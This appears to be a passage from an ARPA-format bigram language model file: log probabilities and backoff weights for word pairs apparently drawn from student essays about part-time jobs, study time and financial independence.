-3.428628 , law -0.048957378
-2.7197275 as law -0.048957378
-0.69396824 international law -0.048957378
-2.7131412 or advanced -0.048957378
-2.0319214 about advanced -0.048957378
-0.995135 advanced mechanical -0.048957378
-2.7082691 I focused -0.048957378
-2.8269253 be focused -0.048957378
-3.0607083 is focused -0.048957378
-3.1764908 and focused -0.048957378
-1.1696702 heavily focused -0.048957378
-2.7282374 I truly -0.048957378
-3.102048 is truly -0.048957378
-3.4163227 to truly -0.048957378
-1.1040449 reasons why -0.11268411
-2.2305765 is why -0.04895735
-1.9644217 reason why -0.048957378
-2.2770538 so why -0.048957378
-1.5351007 see why -0.048957378
-2.2877035 be made -0.048957378
-2.709646 not made -0.048957378
-2.167287 has made -0.048957378
-2.3863747 also made -0.048957378
-2.7428439 have made -0.048957378
-1.467118 effort made -0.048957378
-1.8569338 was made -0.048957378
-2.4184146 more affordable -0.048957378
-2.9060166 are smart -0.048957378
-2.7186737 or gifted -0.048957378
-2.749941 and proper -0.048957378
-2.2787373 get proper -0.048957378
-2.8836398 to reduce -0.048957378
-2.2224748 help reduce -0.048957378
-2.1702561 could reduce -0.048957378
-1.4690876 loans reduce -0.048957378
-0.9942178 significantly reduce -0.048957378
-2.1656544 I firmly -0.048957378
-2.880715 be encouraged -0.048957378
-3.246793 and reach -0.048957378
-2.84126 they reach -0.048957378
-2.2854536 we reach -0.048957378
-2.0134768 doing meaningless -0.048957378
-3.5096595 , unchallenging -0.048957378
-3.2979217 and pointless -0.048957378
-3.0090466 for anyone -0.048957378
-2.983328 that anyone -0.048957378
-2.4081247 by anyone -0.048957378
-3.089379 in anyone -0.048957378
-2.2854962 so fortunate -0.048957378
-1.865197 was fortunate -0.048957378
-1.2950919 anyone fortunate -0.048957378
-2.920025 to attend -0.04895735
-3.0382125 for everyone -0.048957378
-1.295562 Not everyone -0.048957378
-2.2356086 time wisely -0.187397
-2.7730234 have wisely -0.048957378
-2.4039898 more wisely -0.048957378
-2.099842 spend wisely -0.048957378
-3.246793 and moving -0.048957378
-1.9191778 ft moving -0.048957378
-1.7327547 before moving -0.048957378
-3.4479775 to refrain -0.048957378
-2.5596967 should refrain -0.048957378
-1.8375617 your circle -0.048957378
-0.6942267 vicious circle -0.048957378
-2.6468444 student knows -0.048957378
-0.6942267 Everyone knows -0.048957378
-2.1511004 most precious -0.048957378
-2.2313263 these precious -0.048957378
-0.995135 precious commodity -0.048957378
-3.644728 <s> Consider -0.048957378
-2.469975 an average -0.048957378
-3.601002 <s> 20 -0.048957378
-2.4133134 by 20 -0.048957378
-2.5535734 working 20 -0.048957378
-3.087084 of hours -0.048957378
-2.5126505 working hours -0.048957378
-2.2716413 school hours -0.048957378
-1.9746685 enough hours -0.048957378
-0.2540477 20 hours -0.04895735
-0.6931254 25 hours -0.048957378
-1.4646233 few hours -0.048957378
-1.5302515 long hours -0.048957378
-1.1675731 40 hours -0.048957378
-0.6931254 24 hours -0.048957378
-3.6294703 <s> 5 -0.048957378
-3.4931862 , 5 -0.048957378
-2.596196 student days -0.048957378
-1.842265 college days -0.048957378
-1.3174148 these days -0.20946135
-1.4667772 free days -0.048957378
-2.3675284 my days -0.048957378
-0.9933765 5 days -0.048957378
-1.292295 Those days -0.048957378
-0.9933765 five days -0.048957378
-2.2188385 a week -0.048957378
-2.349459 study week -0.048957378
-0.40941563 per week -0.04895735
-0.69396824 5-day week -0.048957378
-3.09512 <s> Getting -0.048957378
-3.2799814 and ready -0.048957378
-0.99501497 Getting ready -0.048957378
-3.2979217 and driving -0.048957378
-2.1279233 can easily -0.048957378
-2.1770248 could easily -0.048957378
-1.5370556 quit easily -0.048957378
-1.8359201 extra hour -0.048957378
-2.1350715 after hour -0.048957378
-0.9944986 Every hour -0.048957378
-0.69396824 waking hour -0.048957378
-3.0382125 for each -0.048957378
-1.295562 hour each -0.048957378
-2.3846152 this day -0.048957378
-2.868108 that day -0.048957378
-3.036213 a day -0.048957378
-2.7474363 the day -0.048957378
-2.2500978 one day -0.048957378
-1.6338902 following day -0.048957378
-2.3936956 all day -0.048957378
-1.4629536 free day -0.048957378
-1.3846903 every day -0.048957378
-0.991978 each day -0.048957378
-1.1663197 whose day -0.048957378
-0.6927047 Their day -0.048957378
-0.6927047 6 day -0.048957378
-2.0522041 's 25 -0.048957378
-2.8133025 time lost -0.048957378
-0.6942267 causing lost -0.048957378
-1.2219176 hours per -0.187397
-0.99501497 lost per -0.048957378
-2.8665538 the risk -0.187397
-2.5259967 at risk -0.048957378
-1.837133 high risk -0.048957378
-2.722524 will cause -0.048957378
-1.8141055 may cause -0.048957378
-2.873293 be added -0.048957378
-2.3605163 the added -0.048957378
-3.2676826 of frustration -0.048957378
-1.4711709 added frustration -0.048957378
-0.995135 Maintaining friendly -0.048957378
-2.726789 with coworkers -0.048957378
-3.2799814 and coworkers -0.048957378
-3.1303647 is bound -0.048957378
-2.880715 be tempting -0.048957378
-2.880715 be urged -0.048957378
-2.1594095 as soon -0.187397
-1.6454853 force soon -0.048957378
-1.8362309 right soon -0.048957378
-2.1737337 <s> First -0.5104914
-1.8373363 : First -0.048957378
-3.2908964 a dependent -0.048957378
-1.6465397 fully dependent -0.048957378
-0.995135 dependent child -0.048957378
-3.1303647 is rapidly -0.048957378
-0.6942867 rapidly underway -0.048957378
-3.644728 <s> Quite -0.048957378
-2.7972748 have moved -0.048957378
-3.093125 a home -0.048957378
-3.1340673 the home -0.048957378
-2.5388384 from home -0.048957378
-1.4646233 leave home -0.048957378
-1.6161044 at home -0.04895735
-2.2490206 get home -0.048957378
-1.1675731 staying home -0.048957378
-1.8531619 family home -0.048957378
-1.863004 going home -0.048957378
-1.3873869 back home -0.048957378
-2.0882785 having responsibility -0.048957378
-2.757981 the responsibility -0.187397
-3.2241242 , responsibility -0.048957378
-2.6443284 and responsibility -0.048957378
-2.3596568 of responsibility -0.13618872
-1.9865333 financial responsibility -0.048957378
-2.6019366 or responsibility -0.048957378
-1.3801705 take responsibility -0.187397
-2.1188965 social responsibility -0.048957378
-1.3875152 teaches responsibility -0.048957378
-1.3853806 certainly responsibility -0.048957378
-0.99225736 comes responsibility -0.048957378
-3.5096595 , ranging -0.048957378
-3.4650414 to bed -0.048957378
-2.859086 be sure -0.048957378
-1.5375328 making sure -0.048957378
-2.0486636 make sure -0.048957378
-3.014355 their homework -0.048957378
-0.89532995 doing homework -0.048957378
-3.120598 is completed -0.048957378
-1.295562 properly completed -0.048957378
-1.947228 university dormitories -0.048957378
-1.17113 preparing breakfast -0.048957378
-3.4625692 , lunch -0.048957378
-2.5259967 at lunch -0.048957378
-1.3916435 eat lunch -0.048957378
-3.2979217 and dinner -0.048957378
-2.8541157 they never-the-less -0.048957378
-2.7044797 can build -0.048957378
-2.5943775 to build -0.04895735
-2.469975 an identity -0.048957378
-2.7368789 I fve -0.048957378
-2.1655056 you fve -0.048957378
-2.7556913 not mentioned -0.048957378
-0.9947796 fve mentioned -0.048957378
-1.2950919 above mentioned -0.048957378
-2.7413492 I admit -0.048957378
-2.3941946 may seem -0.048957378
-2.454793 all seem -0.048957378
-3.4650414 to handle -0.048957378
-1.8943456 a person -0.08422062
-3.3187766 to person -0.048957378
-2.5665698 from person -0.048957378
-2.0207255 better person -0.048957378
-2.099497 young person -0.048957378
-1.16925 rounded person -0.048957378
-1.4715303 late teens -0.048957378
-2.7385423 it early -0.048957378
-1.884914 an early -0.187397
-2.678043 or early -0.048957378
-1.4690876 especially early -0.048957378
-2.0805624 out early -0.048957378
-1.3926156 early twenties -0.048957378
-2.4456112 that adding -0.048957378
-1.5957409 By adding -0.048957378
-2.469975 an unnecessary -0.048957378
-3.4204583 the contrary -0.048957378
-3.4204583 the aforementioned -0.048957378
-2.4003265 my list -0.048957378
-0.6942267 aforementioned list -0.048957378
-3.28005 of remuneration -0.048957378
-1.7714736 personal satisfaction -0.048957378
-3.106568 in gaining -0.048957378
-3.244391 of gaining -0.048957378
-2.8837602 are gaining -0.048957378
-2.7056403 and independence -0.048957378
-3.1699133 of independence -0.048957378
-3.3187766 to independence -0.048957378
-1.0976044 financial independence -0.04895735
-2.0399847 his independence -0.048957378
-0.69368714 fiscal independence -0.048957378
-3.120598 is enormous -0.048957378
-2.4667776 an enormous -0.048957378
-1.4715303 added self-esteem -0.048957378
-2.7044797 can manifest -0.048957378
-1.3923441 likely manifest -0.048957378
-3.1293185 in improved -0.048957378
-3.2358162 a growing -0.048957378
-3.21812 of growing -0.048957378
-1.8631164 was growing -0.048957378
-0.69396824 youngsters growing -0.048957378
-3.2676826 of securing -0.048957378
-3.4479775 to securing -0.048957378
-3.4931862 , dating -0.048957378
-1.6472148 makes dating -0.048957378
-3.2799814 and easier -0.048957378
-1.5384284 much easier -0.048957378
-3.4479775 to ask -0.048957378
-2.3987331 fs ask -0.048957378
-3.2676826 of view -0.048957378
-1.9208251 They view -0.048957378
-3.2649243 a big -0.048957378
-2.3701181 many big -0.048957378
-2.2866669 one big -0.048957378
-1.1708648 big party -0.048957378
-0.99501497 third party -0.048957378
-3.3971481 , drinking -0.048957378
-3.1764908 and drinking -0.048957378
-2.0805624 out drinking -0.048957378
-2.0069268 where drinking -0.048957378
-0.6938276 binge drinking -0.048957378
-2.4177067 by joining -0.048957378
-3.2799814 and joining -0.048957378
-3.284121 the clubs -0.048957378
-3.0728445 in clubs -0.048957378
-2.1414988 social clubs -0.048957378
-0.9942178 joining clubs -0.048957378
-1.5351007 All clubs -0.048957378
-2.9060166 are washing -0.048957378
-2.2445176 <s> My -0.08422062
-2.708228 can create -0.048957378
-2.0329945 In Australia -0.04895735
-2.7282374 I studied -0.048957378
-1.8655307 being studied -0.048957378
-2.7835681 have studied -0.048957378
-3.539724 <s> University -0.048957378
-3.284121 the University -0.048957378
-3.0728445 in University -0.048957378
-2.9605632 their University -0.048957378
-0.6938276 Northeastern University -0.048957378
-3.28005 of Technology -0.048957378
-0.6942867 Technology Sydney -0.048957378
-1.734036 were 8,000 -0.048957378
-3.644728 <s> 75 -0.048957378
-0.6942267 75 % -0.048957378
-0.6942267 100 % -0.048957378
-2.7368789 I knew -0.048957378
-2.8497334 they knew -0.048957378
-2.452609 for companies -0.048957378
-2.3482852 many companies -0.048957378
-3.0415518 in companies -0.048957378
-1.5340091 change companies -0.048957378
-1.1688302 big companies -0.048957378
-1.3892777 public companies -0.048957378
-0.69354665 card companies -0.048957378
-1.5961065 companies hire -0.048957378
-3.4479775 to test -0.048957378
-1.1708648 perfect test -0.048957378
-2.4573214 their character -0.048957378
-2.4247963 a positive -0.04895735
-2.165397 very positive -0.048957378
-1.6465397 same thing -0.048957378
-1.295562 positive thing -0.048957378
-2.4149823 this point -0.048957378
-3.1356838 a point -0.048957378
-3.1880362 the point -0.048957378
-2.3557408 important point -0.048957378
-2.2654846 what point -0.048957378
-0.80643505 final point -0.187397
-1.4662849 My point -0.048957378
-0.6934062 grade point -0.048957378
-2.1210358 This indirectly -0.048957378
-2.7708824 it cheaper -0.048957378
-2.7364948 on taxpayers -0.048957378
-2.031715 In summary -0.048957378
-3.1215048 in summary -0.048957378
-3.644728 <s> Overall -0.048957378
-2.9652722 for both -0.048957378
-3.022964 is both -0.048957378
-3.340304 , both -0.048957378
-2.8627641 to both -0.048957378
-1.6861866 success both -0.048957378
-1.7266748 lives both -0.048957378
-0.69354665 juggle both -0.048957378
-2.5542762 the economy -0.27955192
-1.5370556 local economy -0.048957378
-1.1705118 general economy -0.048957378
-1.9471688 how easy -0.048957378
-1.9222652 too easy -0.048957378
-3.4650414 to hide -0.048957378
-2.9150915 to stay -0.048957378
-2.4488342 them stay -0.048957378
-1.1710447 stay attached -0.048957378
-3.3047535 a backdrop -0.048957378
-3.28005 of lots -0.048957378
-3.28005 of bare -0.048957378
-0.6942867 bare facts -0.048957378
-2.6392057 student obtain -0.048957378
-2.3912728 to obtain -0.048957378
-2.84126 they obtain -0.048957378
-2.880715 be converted -0.048957378
-3.2676826 of wisdom -0.048957378
-0.6942267 coined wisdom -0.048957378
-3.4204583 the broader -0.048957378
-2.2803774 some departments -0.048957378
-1.8385657 focus strictly -0.048957378
-2.2389286 is common -0.13618872
-2.165397 very common -0.048957378
-3.644728 <s> More -0.048957378
-3.2908964 a break -0.048957378
-0.99501497 summer break -0.048957378
-2.2051396 studies -- -0.048957378
-2.2854962 so -- -0.048957378
-1.4704666 entirely -- -0.048957378
-3.0230536 their subconscious -0.048957378
-0.6942867 subconscious processes -0.048957378
-3.4204583 the information -0.048957378
-2.6489563 with class -0.048957378
-3.0733142 a class -0.048957378
-1.6798586 full-time class -0.048957378
-2.2123137 in class -0.13618872
-3.1932025 to class -0.048957378
-1.808525 my class -0.048957378
-1.586511 between class -0.048957378
-0.6929851 pure class -0.048957378
-1.9465262 our class -0.048957378
-0.6929851 swimming class -0.048957378
-0.9925369 miss class -0.048957378
-3.2102208 and concentration -0.048957378
-2.9787707 their concentration -0.048957378
-2.8669279 are concentration -0.048957378
-2.22595 help concentration -0.048957378
-1.5956279 Such connections -0.048957378
-2.1510062 social connections -0.048957378
-2.8497334 they ca -0.048957378
-0.6942267 Customers ca -0.048957378
-2.5982223 from pure -0.048957378
-3.2979217 and association -0.048957378
-3.2979217 and faculty -0.048957378
-2.7044797 can enrich -0.048957378
-0.99501497 greatly enrich -0.048957378
-1.3382268 those whose -0.048957378
-1.7708699 individual whose -0.048957378
-2.7143507 will ultimately -0.048957378
-2.4250028 and ultimately -0.04895735
-2.3904223 may ultimately -0.048957378
-1.3925304 ultimately remain -0.048957378
-3.2649243 a company -0.048957378
-2.2866669 one company -0.048957378
-1.6458207 bad company -0.048957378
-3.3047535 a network -0.048957378
-2.8665538 the end -0.13618872
-2.966896 students end -0.048957378
-2.2860384 who end -0.048957378
-2.1375635 up needing -0.048957378
-3.644728 <s> Student -0.048957378
-2.7983925 work record -0.048957378
-3.2799814 and references -0.048957378
-2.0866277 good references -0.048957378
-2.5283554 the individual -0.099168696
-2.9262898 their individual -0.048957378
-2.34165 The individual -0.048957378
-1.5564684 an individual -0.04895735
-1.5914499 responsible individual -0.048957378
-1.3888488 every individual -0.048957378
-0.69354665 minded individual -0.048957378
-3.4479775 to coursework -0.048957378
-2.0508933 's coursework -0.048957378
-3.2676826 of applications -0.048957378
-1.3922309 practical applications -0.048957378
-3.644728 <s> Practical -0.048957378
-2.415659 more background -0.048957378
-0.6942267 Practical background -0.048957378
-3.4204583 the principles -0.048957378
-2.4095836 that he -0.048957378
-2.6838725 job he -0.048957378
-3.2450058 , he -0.048957378
-2.668018 not he -0.048957378
-3.0156138 and he -0.048957378
-2.66345 as he -0.048957378
-2.3427842 skills he -0.048957378
-2.0724325 If he -0.048957378
-1.7231714 before he -0.048957378
-1.6362174 since he -0.048957378
-0.6929851 principles he -0.048957378
-3.4625692 , she -0.048957378
-2.7024844 or she -0.04895735
-2.100188 If she -0.048957378
-3.4204583 the specific -0.048957378
-1.4711709 eventually wants -0.048957378
-0.99501497 definitely wants -0.048957378
-3.644728 <s> Real-world -0.048957378
-3.428628 , mature -0.048957378
-3.3813157 to mature -0.048957378
-2.9554257 students mature -0.048957378
-2.8669279 are mature -0.048957378
-2.1061108 into functioning -0.048957378
-1.469627 productive members -0.048957378
-2.4438105 all members -0.048957378
-1.5935729 adult members -0.048957378
-0.69396824 Family members -0.048957378
-2.7665153 it instils -0.048957378
-2.7747319 job instils -0.048957378
-3.2177634 the discipline -0.048957378
-2.6044638 student discipline -0.048957378
-3.1159992 and discipline -0.048957378
-3.1476786 of discipline -0.048957378
-1.9993248 financial discipline -0.048957378
-0.99365675 instils discipline -0.048957378
-1.1688302 greater discipline -0.048957378
-2.596728 to fulfill -0.04895735
-2.8665538 the expectations -0.048957378
-1.9436464 no expectations -0.048957378
-0.69410884 realistic expectations -0.048957378
-3.2979217 and abide -0.048957378
-3.4204583 the rules -0.048957378
-3.28005 of filing -0.048957378
-0.6942867 filing correspondence -0.048957378
-1.2840128 being organized -0.048957378
-3.2979217 and attentive -0.048957378
-3.4650414 to details -0.048957378
-3.3813157 to realize -0.048957378
-2.439348 them realize -0.048957378
-1.863773 Japan realize -0.048957378
-1.536077 us realize -0.048957378
-2.709418 with co-workers -0.048957378
-2.983328 that co-workers -0.048957378
-2.9787707 their co-workers -0.048957378
-2.3897333 my co-workers -0.048957378
-3.246793 and rely -0.048957378
-2.966896 students rely -0.048957378
-1.2950919 co-workers rely -0.048957378
-3.4204583 the efficient -0.048957378
-2.7267487 will motivate -0.048957378
-2.859086 be diligent -0.048957378
-3.102048 is diligent -0.048957378
-2.7556913 not diligent -0.048957378
-2.469975 an earlier -0.048957378
-3.0267124 in age -0.048957378
-3.0886452 and age -0.048957378
-3.126527 of age -0.048957378
-2.1659796 college age -0.048957378
-2.095972 young age -0.048957378
-1.3886466 early age -0.048957378
-0.6934062 earlier age -0.048957378
-0.6934062 correct age -0.048957378
-2.7708678 <s> Second -0.27955192
-2.7796392 job broadens -0.048957378
-2.968909 that interest -0.048957378
-3.1933482 of interest -0.048957378
-2.397768 more interest -0.048957378
-0.6938276 broadens interest -0.048957378
-0.6938276 losing interest -0.048957378
-3.2979217 and opens -0.048957378
-1.1710447 wider array -0.048957378
-2.7542121 job possibilities -0.048957378
-1.9186237 career possibilities -0.048957378
-2.223746 these possibilities -0.048957378
-0.69396824 diminished possibilities -0.048957378
-3.4625692 , yet -0.048957378
-3.246793 and yet -0.048957378
-2.7835681 have yet -0.048957378
-3.2908964 a clear -0.048957378
-1.5956279 made clear -0.048957378
-3.644728 <s> Actual -0.048957378
-2.6302562 student determine -0.048957378
-3.3813157 to determine -0.048957378
-2.22595 help determine -0.048957378
-1.1700908 sometimes determine -0.048957378
-3.2358162 a kind -0.048957378
-2.2714837 some kind -0.048957378
-2.8669279 are kind -0.048957378
-1.7067324 what kind -0.187397
-1.7717999 he likes -0.048957378
-2.7186737 or dislikes -0.048957378
-2.208895 which managerial -0.048957378
-3.2676826 of finance -0.048957378
-2.1035345 -LRB- finance -0.048957378
-3.244391 of human -0.048957378
-2.7283971 as human -0.048957378
-2.7024844 or human -0.048957378
-3.2102208 and resources -0.048957378
-1.9642754 other resources -0.048957378
-1.1700908 human resources -0.048957378
-1.1700908 economic resources -0.048957378
-2.2911956 who interns -0.048957378
-2.469975 an advertising -0.048957378
-0.6942867 advertising agency -0.048957378
-3.4163227 to discover -0.048957378
-2.3904223 may discover -0.048957378
-2.1770248 could discover -0.048957378
-2.469975 an aptitude -0.048957378
-3.0452757 for graphic -0.048957378
-0.6942867 graphic design -0.048957378
-2.7186737 or copywriting -0.048957378
-1.5961065 Such hands-on -0.048957378
-3.3047535 a richer -0.048957378
-1.7695215 individual basis -0.048957378
-0.69410884 richer basis -0.048957378
-0.69410884 temporary basis -0.048957378
-3.0246768 for planning -0.048957378
-2.444559 experience planning -0.048957378
-2.0098362 financial planning -0.048957378
-2.0522041 than waiting -0.048957378
-2.9793792 for around -0.048957378
-2.4508684 people around -0.048957378
-1.3905807 focused around -0.048957378
-0.69368714 waiting around -0.048957378
-1.3899099 look around -0.048957378
-1.2934115 places around -0.048957378
-3.4204583 the rigors -0.048957378
-3.2979217 and dynamics -0.048957378
-3.644728 <s> Usually -0.048957378
-3.4625692 , confidence -0.048957378
-1.8928705 little confidence -0.048957378
-1.8044025 gain confidence -0.048957378
-1.9229224 too ggreen -0.048957378
-3.5692832 <s> h -0.048957378
-2.1451206 world h -0.048957378
-0.69396824 ggreen h -0.048957378
-0.69396824 Works h -0.048957378
-2.7267487 will familiarize -0.048957378
-2.4667776 an office -0.048957378
-1.9471688 how office -0.048957378
-3.246793 and hierarchies -0.048957378
-2.1481786 social hierarchies -0.048957378
-0.9947796 office hierarchies -0.048957378
-2.708228 can situate -0.048957378
-3.3047535 a newcomer -0.048957378
-3.0382125 for guidance -0.048957378
-0.99501497 providing guidance -0.048957378
-3.2979217 and mentoring -0.048957378
-3.09512 <s> Attending -0.048957378
-3.5096595 , writing -0.048957378
-0.6942867 writing essays -0.048957378
-3.2799814 and reports -0.048957378
-1.5956279 been reports -0.048957378
-3.4000094 the side -0.048957378
-1.5378767 either side -0.048957378
-2.342011 would normally -0.048957378
-2.3059957 be taken -0.048957378
-2.8837602 are taken -0.048957378
-1.5946901 best taken -0.048957378
-3.0808864 is needed -0.048957378
-2.7949562 time needed -0.048957378
-2.1138577 much needed -0.048957378
-1.170325 obtaining needed -0.048957378
-3.1215048 in turn -0.048957378
-1.295562 easily turn -0.048957378
-3.28005 of sleep -0.048957378
-2.559273 is essential -0.048957378
-1.8888423 an essential -0.048957378
-0.69410884 sleep essential -0.048957378
-2.7226624 job later -0.048957378
-2.5359309 in later -0.048957378
-2.3355312 study later -0.048957378
-2.6549041 or later -0.048957378
-1.9133835 career later -0.048957378
-1.4277198 need later -0.048957378
-0.69354665 illness later -0.048957378
-2.6641047 can actually -0.048957378
-2.677301 will actually -0.048957378
-3.1476786 of actually -0.048957378
-3.2905889 to actually -0.048957378
-2.7665734 time actually -0.048957378
-2.5331511 should actually -0.048957378
-2.80292 they actually -0.048957378
-3.644728 <s> Along -0.048957378
-2.9060166 are career-oriented -0.048957378
-2.9982424 that choosing -0.048957378
-3.106568 in choosing -0.048957378
-1.5948578 By choosing -0.048957378
-2.2445176 <s> All -0.048957378
-2.7972748 have secretary -0.048957378
-3.2649243 a manager -0.048957378
-3.3624787 the manager -0.048957378
-3.4625692 , manager -0.048957378
-3.2908964 a treasurer -0.048957378
-3.2799814 and treasurer -0.048957378
-3.09512 <s> Taking -0.048957378
-3.0452757 for instance -0.187397
-2.8541157 they plan -0.048957378
-3.3047535 a branch -0.048957378
-3.246793 and budget -0.048957378
-3.4163227 to budget -0.048957378
-2.393125 fs budget -0.048957378
-2.1656544 I fd -0.048957378
-2.4199624 by saying -0.048957378
-1.734036 lives inside -0.048957378
-2.859086 be concentrating -0.048957378
-2.7556913 not concentrating -0.048957378
-3.246793 and concentrating -0.048957378
-2.45335 this fact -0.048957378
-2.878185 the fact -0.27955192
-2.2791026 one hand -0.048957378
-1.4668891 first hand -0.048957378
-1.961792 other hand -0.11268411
-1.5359479 second hand -0.048957378
-0.6938276 kitchen hand -0.048957378
-3.4479775 to loss -0.048957378
-1.1708648 causes loss -0.048957378
-1.969951 other genuine -0.048957378
-2.873293 be engaging -0.048957378
-3.4931862 , engaging -0.048957378
-2.920025 to play -0.048957378
-2.469975 an instrument -0.048957378
-3.5096595 , sports -0.048957378
-2.6862712 will simply -0.048957378
-2.130835 or simply -0.048957378
-2.8351026 are simply -0.048957378
-1.3895458 developed simply -0.048957378
-2.323799 would simply -0.048957378
-0.9939372 well-being simply -0.048957378
-3.4931862 , hang -0.048957378
-1.5378767 simply hang -0.048957378
-2.0880563 good friend -0.048957378
-2.7187858 with developing -0.048957378
-3.246793 and developing -0.048957378
-2.7259424 on developing -0.048957378
-3.4204583 the danger -0.048957378
-3.28005 of ending -0.048957378
-3.3047535 a materialistic -0.048957378
-0.6942867 materialistic inclined -0.048957378
-2.7309246 with diminished -0.048957378
-3.28005 of understating -0.048957378
-2.5958927 with our -0.048957378
-2.6613982 be our -0.048957378
-3.11635 , our -0.048957378
-1.9867003 In our -0.048957378
-2.9009323 in our -0.048957378
-2.9576278 of our -0.048957378
-3.0623753 to our -0.048957378
-2.4881823 from our -0.048957378
-2.123871 on our -0.048957378
-2.3032832 fs our -0.048957378
-2.0069056 make our -0.048957378
-1.3812549 improve our -0.048957378
-1.1642387 fulfill our -0.048957378
-1.45804 around our -0.048957378
-1.5226038 All our -0.048957378
-0.69200426 understating our -0.048957378
-1.2867545 its our -0.048957378
-0.69200426 shows our -0.048957378
-1.1710447 human beings -0.048957378
-2.8176763 time ... -0.048957378
-2.0747159 that we -0.04895735
-2.570245 job we -0.048957378
-2.2481103 , we -0.048957378
-2.5689516 as we -0.048957378
-1.9277668 reason we -0.048957378
-1.8939558 jobs we -0.048957378
-2.221037 school we -0.048957378
-1.700656 if we -0.187397
-2.030456 then we -0.048957378
-2.4388337 money we -0.048957378
-2.2005894 so we -0.048957378
-1.621705 College we -0.048957378
-1.0738788 when we -0.04895735
-2.2028208 what we -0.048957378
-2.0277584 If we -0.048957378
-1.9283803 believe we -0.13618872
-1.4172114 where we -0.048957378
-1.7068932 before we -0.048957378
-1.5160207 until we -0.048957378
-1.3764908 system we -0.048957378
-1.8815417 think we -0.048957378
-1.6670213 age we -0.048957378
-1.2829179 When we -0.048957378
-1.4523605 everything we -0.048957378
-0.69102556 whenever we -0.048957378
-2.387195 do sooner -0.048957378
-2.4342768 this opinion -0.20946135
-2.5411224 the opinion -0.13618872
-2.3543274 The opinion -0.048957378
-1.766022 personal opinion -0.048957378
-0.9614261 my opinion -0.12260215
-3.4650414 to rush -0.048957378
-2.8983755 are concentrated -0.048957378
-0.99501497 Without concentrated -0.048957378
-2.4081247 by its -0.048957378
-2.5208 at its -0.048957378
-1.6444623 since its -0.048957378
-1.294531 determine its -0.048957378
-2.4568932 for us -0.048957378
-1.5920713 helps us -0.187397
-1.3895458 show us -0.048957378
-1.5348523 let us -0.048957378
-1.3895458 allow us -0.048957378
-1.4679527 around us -0.048957378
-2.3542027 study causes -0.048957378
-1.6458207 main causes -0.048957378
-2.0497692 smoke causes -0.048957378
-1.1710447 human unhappiness -0.048957378
-3.4204583 the love -0.048957378
-3.4204583 the sole -0.048957378
-2.2215545 a few -0.099168696
-1.9459207 how few -0.048957378
-1.3916435 last few -0.048957378
-1.4715303 few bucks -0.048957378
-2.7477093 a distraction -0.048957378
-1.1708648 obvious distraction -0.048957378
-3.106568 in further -0.048957378
-2.7398808 and further -0.048957378
-1.1706803 contributing further -0.048957378
-1.2958019 further cloud -0.048957378
-3.4204583 the tricky -0.048957378
-0.6942867 tricky monetary -0.048957378
-0.6942867 monetary enslavement -0.048957378
-2.7167566 and live -0.048957378
-3.3489213 to live -0.048957378
-2.5439303 should live -0.048957378
-2.0068414 well live -0.048957378
-2.276979 we live -0.048957378
-2.6468444 student under -0.048957378
-1.4711709 live under -0.048957378
-1.2958019 short span -0.048957378
-1.5961916 between childhood -0.048957378
-3.4650414 to assure -0.048957378
-3.246793 and mental -0.048957378
-2.4103017 more mental -0.048957378
-2.393125 fs mental -0.048957378
-1.1710447 mental stability -0.048957378
-2.7708678 <s> Every -0.13618872
-2.4119422 for his -0.048957378
-2.1990962 in his -0.13618872
-2.8984869 and his -0.048957378
-2.3423495 of his -0.04895735
-2.771218 to his -0.048957378
-2.1259377 on his -0.048957378
-2.0556114 -LRB- his -0.048957378
-1.8452199 pay his -0.048957378
-2.2817597 when his -0.048957378
-1.8918848 support his -0.048957378
-1.3819399 manage his -0.048957378
-1.3819399 allow his -0.048957378
-1.5235524 lose his -0.048957378
-0.6921442 assert his -0.048957378
-0.6921442 starting his -0.048957378
-0.6921442 corrupts his -0.048957378
-0.6921442 focuses his -0.048957378
-2.4612203 for her -0.048957378
-3.1933482 of her -0.048957378
-3.3489213 to her -0.048957378
-2.678043 or her -0.048957378
-1.5351007 lose her -0.048957378
-3.09512 <s> No -0.048957378
-0.995135 No deviation -0.048957378
-2.7580705 it allowed -0.048957378
-2.859086 be allowed -0.13618872
-2.8837602 are allowed -0.048957378
-3.120598 is absolutely -0.048957378
-1.5378767 am absolutely -0.048957378
-2.7796392 job executed -0.048957378
-2.104077 any conditions -0.048957378
-1.8378968 necessary conditions -0.048957378
-3.644728 <s> Studying -0.048957378
-2.7044797 can influence -0.048957378
-1.3923441 negative influence -0.048957378
-3.102048 is sometimes -0.048957378
-3.4625692 , sometimes -0.048957378
-3.246793 and sometimes -0.048957378
-2.401619 fs fate -0.048957378
-3.09512 <s> Depending -0.187397
-3.4204583 the destiny -0.048957378
-2.5628006 the entire -0.04895735
-3.0382125 for generations -0.048957378
-2.3987331 fs generations -0.048957378
-2.3729722 The damage -0.048957378
-0.99501497 consequently damage -0.048957378
-2.880715 be irreversible -0.048957378
-1.647248 bad qualified -0.048957378
-0.995135 productivity causing -0.048957378
-1.1710447 entire nation -0.048957378
-2.174259 <s> Even -0.27406517
-1.9456341 no direct -0.048957378
-1.3923441 result direct -0.048957378
-1.6474046 possible wastes -0.048957378
-3.4204583 the production -0.048957378
-2.219547 reasons above -0.048957378
-2.8665538 the above -0.13618872
-0.69410884 stated above -0.048957378
-3.4000094 the institutions -0.048957378
-2.454793 all institutions -0.048957378
-2.052458 first priority -0.048957378
-3.0230536 their agendas -0.048957378
-0.995135 No excuses -0.048957378
-2.1054032 any delay -0.048957378
-3.28005 of action -0.048957378
-2.880715 be accepted -0.048957378
-2.928319 that right -0.048957378
-3.1356838 a right -0.048957378
-2.7126353 job right -0.048957378
-2.0256789 the right -0.0796529
-3.0886452 and right -0.048957378
-2.9101167 their right -0.048957378
-2.228456 education right -0.048957378
-1.1684108 truly right -0.048957378
-2.880715 be assured -0.048957378
-1.1710447 perfect self-improvement -0.048957378
-3.3047535 a worthwhile -0.048957378
-1.8956895 It serves -0.048957378
-1.797456 important element -0.048957378
-3.4204583 the preparatory -0.048957378
-3.2358162 a stage -0.048957378
-2.3708131 important stage -0.048957378
-0.69396824 preparatory stage -0.048957378
-0.69396824 curious stage -0.048957378
-2.5885956 from country -0.048957378
-2.2866669 one country -0.048957378
-0.69410884 conscious country -0.048957378
-3.1293185 in Asia -0.048957378
-0.6942867 Asia whereby -0.048957378
-1.5383809 feel obliged -0.048957378
-1.647248 financially self-supporting -0.048957378
-3.3677967 , save -0.048957378
-3.1451926 and save -0.048957378
-2.5737934 to save -0.13618872
-2.8121924 they save -0.048957378
-1.6417291 families save -0.048957378
-1.5913469 both save -0.048957378
-3.2979217 and augment -0.048957378
-3.2908964 a whole -0.048957378
-2.1194625 This whole -0.048957378
-2.543778 money among -0.048957378
